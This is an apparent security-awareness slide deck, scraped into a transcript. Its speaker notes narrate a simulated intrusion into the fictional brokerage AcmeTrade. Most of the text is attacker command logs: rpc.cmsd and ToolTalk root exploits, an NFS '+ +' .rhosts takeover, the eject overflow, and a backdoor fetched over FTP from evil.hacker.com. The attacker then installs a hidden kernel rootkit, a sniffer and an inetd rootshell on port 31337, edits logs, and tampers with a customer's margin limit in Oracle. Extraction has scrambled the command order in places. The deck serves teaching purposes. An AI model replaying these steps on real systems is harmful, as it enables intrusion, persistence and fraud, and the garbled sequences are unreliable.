Пример атаки. WHOIS Search ACMETRADE.COM Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM)...

of 35 /35
Пример атаки

Embed Size (px)

Transcript of Пример атаки. WHOIS Search ACMETRADE.COM Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM)...


  • Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338

    Domain Name: ACMETRADE.COM

    Administrative Contact: Vaughn, Danon (ES2394) [email protected] (678)443-6000 (FAX) (678) 443-6476 Technical Contact, Zone Contact: Bergman, Bret (ET2324) [email protected] (678)443-6100 (FAX) (678) 443-6208 Billing Contact: Fields, Hope (ET3427) [email protected] (678)443-6101 (FAX) (678) 443-6401

    Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT

    Domain servers in listed order:

    dns.acmetrade.com208.21.2.67 www.acmetrade.com208.21.2.10 www1.acmetrade.com208.21.2.12 www2.acmetrade.com208.21.2.103http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

  • hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker>

  • hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source port 53rtable_create workedExploit successful. Portshell created on port 33505hacker:/export/home/hacker>Trying to dns.acmetrade.com.Escape character is '^]'.#iduid=0(root) gid=0(root)#uname -aSunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5#telnet dns.acmetrade.com 33505

  • ##nslookupDefault Server: dns.acmetrade.comAddress:>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com208.21.2.10www1.acmetrade.com208.21.2.12www2.acmetrade.com208.21.2.103margin.acmetrade.com208.21.4.10marketorder.acmetrade.com208.21.2.62deriv.acmetrade.com208.21.2.25deriv1.acmetrade.com208.21.2.13bond.acmetrade.com208.21.2.33ibd.acmetrade.com208.21.2.27fideriv.acmetrade.com208.21.4.42backoffice.acmetrade.com208.21.4.45wiley.acmetrade.com208.21.2.29bugs.acmetrade.com208.21.2.89fw.acmetrade.com208.21.2.94fw1.acmetrade.com208.21.2.21

  • ####rpcinfo -p www.acmetrade.com | grep mountd100005 1 udp 643 mountd100005 1 tcp 647 mountdshowmount -e www.acmetrade.com/usr/localserver2, server3, server4/export/home sunspotrpcinfo -p www1.acmetrade.com | grep mountd100005 1 udp 643 mountd100005 1 tcp 647 mountdshowmount -e www1.acmetrade.com/data1server2/aengineering/bengineering/cengineering/export/home(everyone)export list for www.acmetrade.com:#

  • nfs

  • nfsshell.c

  • /data1server2/aengineering/bengineering/cengineering/export/home(everyone)Export list for www1.acmetrade.com:nfs>mount /export/homeMount www1.acmetrade.com[]:/export/homenfs>lsbill bobcelestechuckdandavejennzacknfs>ls l bobdrwxr-xr-x 2 201 1 1024 May 4 1999 bob - protocol: UDP/IP - transfer size: 8192 bytesnfs>nfs>nfs>cd bobuid 201gid 1#nfsshellnfs>host www1.acmetrade.comOpen www1.acmetrade.com[] (mountd) using UDP/IPnfs>export

  • nfs>statusUser id : 201Group id : 1Remote host : www1.acmetrade.comMount path : /export/homeTransfer size: 8192nfs>!sh$echo "+ +" > .rhosts$exitnfs>nfs>put .rhostscat .rhosts+ +nfs>exit#rlogin -l bob www1.acmetrade.comLast login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.comwww1%whoamibobwww1%pwd/export/home/bobwww1%uname -aSunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000www1%cat .rhosts+ +

  • www1%www1%ls -la /usr/bin/eject-r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject*www1%gcc -o eject_overflow eject_overflow.cwww1%./eject_overflowJumping to address 0xeffff630 B[364] E[400] SO[400]#whoamiroot#ftp evil.hacker.comConnected to evil.hacker.com.Name (evil.hacker.com:root):331 Password required for hacker.Password:230 User hacker logged in.Remote system type is UNIX.Using binary mode to transfer files.hackereye0wnu220 evil.hacker.com FTP server (HackerOS) ready.

  • ftp>cd solaris_backdoors250 CWD command successful.ftp>get solaris_backdoor.tar.gz200 PORT command successful.150 Binary data connection for out,1152).226 Transfer complete.152323 bytes sent in 31.942233 secs (4.7Kbytes/sec)ftp>quittar -xf module_backdoor.tarcd /tmp/my_toolsgunzip module_backdoor.tar.gz###

  • #cd /tmp/my_tools/module_backdoor#./configureEnter directories and filenames to hide from ls, find, du:#makegcc -c backdoor.cgcc -o installer installer.cld o backdoor r backdoor.o#Makefilebackdoorbackdoor.cbackdoor.oconfig.hconfigureinstallerinstaller.cls##modload backdoor./installer -d /usr/local/share/...Adding directory...Fixing last modified time...Fixing last accessed time... ... backdoorEnter class C network to hide from netstat:Enter process names to hide from ps and lsof:creating config.h...

  • #ls -la /usr/local/share/......: No such file or directory######./installer backdoor /usr/local/share/.../backdoorInstalling file...Fixing last modified time...Fixing last accessed time...echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd#cd ..rm -rf module_backdoorlsinetd_backdoor/logeditsniffer./installer sniffer /usr/local/share/.../snifferInstalling file...Fixing last modified time...Fixing last accessed time...ls /usr/local/share/.../sniffer/usr/local/share/.../sniffer: No such file or directory#cd /usr/local/share/...#./sniffer > out ps -aef | grep sniffer#

  • #netstatTCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State-------------------- -------------------- ----- ------ ----- ------ ------- 8760 0 8760 648 ESTABLISHED208. 8760 0 8760 0 ESTABLISHED208. 8760 0 8760 0 ESTABLISHED#cd /tmp/my_tools#cd inetd_backdoor#lsconfig.hconfigureinetd.cinstaller.c#./configureEnter port for hidden shell:#makegcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolvgcc -o installer installer.c#installer inetd /usr/sbin/inetdInstalling file...Fixing last modified time...Fixing last accessed time...creating config.h...creating Makefile...31337

  • Trying character is '^]'.telnet www1.acmetrade.com 31337Granting rootshell...#hostnamewww1#whoamiroot##ps aef | grep inetdroot 179 1 0 May 10 ? 1:26 /usr/sbin/inetd -s##kill 9 179#exit/usr/sbin/inetd s &Connection closed by foreign host.hacker:/export/home/hacker>

  • hacker:/export/home/hacker>ftp www1.acmetrade.comConnected to www1220 www1.acmetrade.com FTP service (Version 2.5).Name:root331 Password required for root.Password:*******230 User root logged in.Remote system type is Unix. ftp>put backdoor.html securelogin.html200 PORT command successful.150 Opening BINARY mode data connection for index.html226 Transfer complete.ftp>quit200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls.total 10-rwxr-xr-x 9 root other 1024 Aug 17 17:07 .-rwxr-xr-x 9 root other 1024 Aug 17 17:07 ..-rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html-rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html-rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif-rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif-rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)ftp>dirftp> cd /usr/local/httpd

  • program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100004 2 udp 753 ypserv 100004 1 udp 753 ypserv 100004 1 tcp 754 ypserv 100004 2 tcp 32771 ypserv1073741824 2 udp 32772 100007 3 udp 32779 ypbind 100007 2 udp 32779 ypbind 100007 1 udp 32779 ypbind 100007 3 tcp 32772 ypbind 100007 2 tcp 32772 ypbind 100007 1 tcp 32772 ypbind 100011 1 udp 32781 rquotad 100068 2 udp 32783 100068 3 udp 32783 100068 4 udp 32783 100068 5 udp 32783 100024 1 udp 32784 status 100024 1 tcp 32777 status 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr#rpcinfo -p backoffice.acmetrade.com

  • 100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 100005 1 udp 33184 mountd 100005 2 udp 33184 mountd 100005 3 udp 33184 mountd 100005 1 tcp 32787 mountd 100005 2 tcp 32787 mountd 100005 3 tcp 32787 mountd 100083 1 tcp 32773 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100227 2 udp 2049 nfs_acl 100227 3 udp 2049 nfs_acl 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100227 2 tcp 2049 nfs_acl 100227 3 tcp 2049 nfs_acl##grep ttdbserverd /etc/inetd.conf100083/1tlirpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverdrpcinfo -p backoffice.acmetrade.com | grep 100083100083 1 tcp 32773#cd /tmp/mytools/warez

  • Please wait for your root shell.#./tt backoffice.acmetrade.comhostnamebackofficewhoamiroot#find / -type f -name .rhosts -print/.rhosts/export/home/chuck/.rhosts/export/home/bill/.rhosts/export/home/larry/.rhosts#cat /.rhostsfideriv.acmetrade rootibd.acmetrade rootbugs.acmetraderoot#w10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03User tty [email protected] idle JCPU PCPU whatroot console 9:27am 147:52 14:41 14:14 /sbin/shroot pts/5 9:24pm /sbin/sh###/tmp/mytools/logedit root pts/5#w10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03User tty [email protected] idle JCPU PCPU whatroot console 9:27am 147:52 14:41 14:14 /sbin/sh

  • #sqlplus oracle/oracleSQL>describe customersNameNull?Type------------------ -------- -----------LNAMENOT NULL VARCHAR2(20)FNAMENOT NULL VARCHAR2(15)ADDR1NOT NULL VARCHAR2(30)ZIPNOT NULL NUMBER(5)PHONENOT NULL CHAR(12)ACCOUNT_NUMNOT NULL NUMBER(12)BALANCENOT NULL NUMBER(12)MARGIN_LIMITNOT NULL NUMBER(12)ACCT_OPENNOT NULL DATESQL>select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';LNAME FNAMEACCOUNT_NUM MARGIN_LIMIT-------------------- ------------- ----------- ------------Gerulski David5820981 50000.00SQL>update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';SQL>select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';LNAME MARGIN_LIMIT------------------- ------------Gerulski 500000.00SQL>exit

  • Anatomy of the AttackAcmeTrades NetworkUNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIX

  • What is Vulnerable?IT InfrastructureFirewallE-Mail ServerWeb ServerRouterServersClients & WorkstationsNetwork

  • What is Vulnerable?ApplicationsRouterE-CommerceWeb ServerE-Mail ServerFirewallSAPPeoplesoftWeb Browsers

  • What is Vulnerable?DatabasesFirewallRouterOracleMicrosoftSQL ServerSybase

  • What is Vulnerable?FirewallAIXSolarisRouterWindows NTNetworkOperating SystemsHP-UXWindows 95 & NT

  • What is Vulnerable?FirewallE-Mail ServerWeb ServerRouterServersNetworksTCP/IPNetware

    The hacker begins with only a target. At this point the hacker has little or no information about the target host.

    Typically, the first thing the hacker will do is use a internet domain name registrar to gather some publicly available info about the target host and its associated network(s).

    Here, the hacker enters the name of the target and submits it.

    This screen is the standard domain name registrar output screen. It contains the domain name, the address of the owned, the administrative, technical and billing contacts. While this information is useful to some hackers, the most notable information reported is the IP addresses of the domain servers. From this information, the hacker can derive which subnets or netblocks the target owns, and gather a general idea of the targets network topology.

    This slide shows the hacker working from his home machine (evil.hacker.com) to gather information about the DNS server of the target. This hostname and IP address was provided in the domain name record from the previous slide. He runs a program called rpcscan to look for RPC (remote procedure call) services running on the host. RPC services are the source of *many* security vulnerabilities in the UNIX and NT space. In this case, we see that rpc.cmsd is running on the dns host. It has a program number of 100068 and listens on 33505. The program numbers are standard in the RPC spec and are used to reliable identify RPC services, the ports where they listen are somewhat dynamic. They may or may not change when the services are stopped and restarted or when the machine reboots

    This slide shows one of many hacker sites. One relatively recent development in the hacking scene in the last couple of years is the expanded availability of hacker tools and exploits. Many such sites sole purpose is to collect and distribute these tools. Here we are looking a remote cmsd exploit to attempt to run on the cmsd service we discovered earlier.

    Here we found a rpc.cmsd exploit. Exploits these days are very easy to use. Most come with compile instructions so hackers that dont even know how to program or even use a compiler can compile the code and execute them. Some even come with trouble shooting documentation in case the hacker runs into problems using the exploit.Here we first run id and uname to identify ourselves and the architecture of our home machine. Next, we fire off the cmsd exploit and create a portshell on port 33505 on the target (dns.acmetrade.com). The exploit uses source port 53, which in some cases will go through firewalls because DNS uses port 53. The exploit is successful and we verify that by running the id and uname commands on the remote machineNow we use nslookup internally to pull out the zone. Generally, this information will not be available to remote attackers. Dumping this information is called a zone transfer, and most admins have finally configured their servers not to leak this information outside of their own networks. Now we have a complete list of internal targets on the acmetrade network.Here we use rpcinfo which is included in all UNIXs to list out RPC services and related information running on any machine on the network. We are looking for the RPC service mountd. If mountd is running, then that host runs NFS and is exporting partitions to other machines on the network. We look at two machines, www and www1. The first machines exports to serveral hosts, which is fairly secure. The second machine exports /export/home to (everyone), which is the default behavior on most UNIXs. When a partition is exported to (everyone), every host on the internet can mount it if it is accessible. This vulnerability is particularly serious because all of the home directories on the target appear to be exported to everyone. We will try to take advantage of this misconfiguration next.Here is the front page for rootshell. Rootshell was probably the first exploit repository on the internet. At least the first wildly popular one. Here we search for nfs related tools and exploits.

    We find a list of NFS related exploits, tools and information. We are looking for nfsshell in particular. It is a old, but still very useful tool. It creates virtual nfs mounts within its own shell to make mounting and manipulating partitions over NFS a breeze.

    Here we start nfsshell. We open the host www1.acmetrade.com with the suspected exported partition. List out the export list and then attempt to mount /export/home. The mount is successful. Then we run a directory listing to view all the directories of the users on the system. We need to impersonate the user bob to attempt this hack. NFS only authenticates users over NFS by their user and group ids (uid and gid). If the hacker controls the client machine, he can change uids and gids to anything he wants. Nfsshell makes this easier. Here we change our uid and gid to 201 and 1, the same as bobs information.

    Next, we show the status to make sure the commands took. And they did, we are now bob as far as the target is concerned. That will let us manipulate files in bobs directory over the network. We plan to use the + + .rhosts attack. UNIX is shipped with commands called r-commands. They include, rlogin, rsh, rdist, rcp, rexec etc. etc. These commands allow users to build implicit trust models. That is, their users can setup circumstances when they can use them over the network without the hassle of authenticating each time they use them. This is a very obvious security problem. The .rhosts file controls which users can do what with r-commands. .rhosts files support the use of a wildcard +. Using + + in an .rhosts file means that any user from any network host can login to that account without authenticating. This is a favorite trick for hackers as it makes things much easier for them. Here we create a local copy of the .rhosts file and upload it over NFS with the put command. Then we rlogin l into the machine and verify that the .rhosts file is there and that we are in fact, bob

    When we hacked the first machine, the vulnerability in cmsd granted us root access immediately. With the NFS hack, we were not granted this luxury. Since we have breached the machine, we are still a normal user, so we need to try and hack local superuser access ASAP. We go to another hacker site and download a local exploit to try on the machine. Here we go to www.insecure.org. Also the distribution host of the famous scanner/hacking tool NMAP.We find the /bin/eject overflow exploit. There are dozens of these for any version of solaris. Most of the exploits are fairly interchangable. They all produce the same effect, so if one doesnt work, the hacker will use another one from his toolkit to hack root instead.Here we check for the existence of /usr/bin/eject. We find that it exists and it has the suid bit on. The setuid bit on this binary means that this binary runs in a privileged state even if unprivileged users run it. There is a buffer overflow in eject that allows unprivileged users to run privileged code. After compiling and executing, we now have a local root shell. Then we ftp to our home machine (evil.hacker.com) to download some more hacker tools.Here we get a solaris backdoor that we plan to install on the box.The backdoor uses loadable kernel modules. Hacker rootkits that use modules are much more advanced that simply rootkits that replace system binaries. This rootkit will allow us to hide files, directories, network connections and processes. We load the module with modload and then install some of our files and fix the access times.Here we verify that the files we want to hide are actually hidden. Since modules are dynamic, we need to ensure that the module will be reloaded whenever the machine reboots. We do that by inserting a line into a startup script that will reload it when the machine bounces. Next we install a sniffer, run it, and verify that it is hidden.

    Here we verified that our IP address is not listed with netstat. Next we install and configure an inetd backdoor to setup a portshell

    Here we restart inetd to start our new backdoor. Then we verify that it is working and listening on port 31337

    Here we ftp into the acmetrade to illustrate how easy it is to modify or deface the website. Assume that we have the root password since we installed a packet sniffer earlier. Now we going to target the backoffice server. Again, we use rpcinfo to probe the rpc services.We look to see if tooltalk is running on this server. We look up the program number 100083 and check if its running. It is. We then fire off our tooltalk exploit on the host. The tooltalk exploit is probably the most popular unix attack of 99, and maybe 2000. It takes advantage of a remote buffer overflow. Here we run it, and gain access. We then run a find to look for .rhosts files. We find several, and can probably use them to hack more machines. We run w to see who is logged in. We see that the administrator is logged in! Oops, he is idle 147 hours. No worries. We then run our logedit tool to remove our login entry and hide our presence.Here we login to the Oracle database and look up user Gerulski. We change his margin limit from 50k to 500kNow we buy NETA on our extended margin.